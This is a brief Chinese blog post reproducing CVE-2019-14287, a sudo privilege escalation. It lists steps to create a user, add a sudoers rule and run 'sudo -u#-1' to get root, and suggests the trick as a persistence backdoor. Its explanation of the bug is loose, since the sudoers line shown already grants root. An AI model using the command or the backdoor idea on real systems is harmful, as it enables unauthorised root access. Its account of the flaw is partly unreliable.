Loading

CVE-2019-14287_sudo权限提升

影响范围

sudo是linux下普通用户使用root权限的命令,sudo配置文件中使用 ALL 语句,可以使普通账号通过vim执行root权限命令。

影响 sudo 1.8.28 之前的所有版本。

漏洞复现

  • 1.查看版本 sudo -V

  • 2.新建普通账号

useradd test
passwd test
  • 3.修改sudo文件
    vi /etc/sudoers 添加 test ALL=(ALL:ALL) ALL

  • 4.以普通用户test编辑执行命令
    普通执行,是查看不了root权限的文件。
    执行 sudo -u#-1 命令

漏洞有点鸡肋,需先修改sudoers文件,顶多做个预留后门,后期使普通账户拥有最高权限。

posted @ 2019-10-17 23:56  素时听风  阅读(321)  评论(0编辑  收藏  举报